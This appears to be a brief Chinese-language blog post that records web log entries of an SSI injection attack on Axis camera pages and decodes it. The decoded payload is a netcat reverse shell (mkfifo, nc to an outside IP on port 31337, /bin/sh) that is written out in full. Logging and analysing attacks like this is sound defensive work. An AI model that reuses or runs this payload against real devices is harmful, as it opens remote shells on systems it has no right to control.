這幾天出現的 weblog:
193.124.7.9 - - [15/May/2022:19:40:45 +0800] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n" 400 226 "-" "-"
45.148.10.81 - - [15/May/2022:23:07:30 +0800] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n" 400 226 "-" "-"
經過解碼後得到:
/incl/image_test.shtml?camnbr=<!--#exec cmd="mkfifo /tmp/s;nc -w 5 193.124.7.9 31337 0</tmp/s|/bin/sh>/tmp/s 2>/tmp/s;rm /tmp/s" -->
估狗後這是一個 Axis SSI 遠端執行和讀取文件攻擊, 沒有找到更多說明
沒有留言:
張貼留言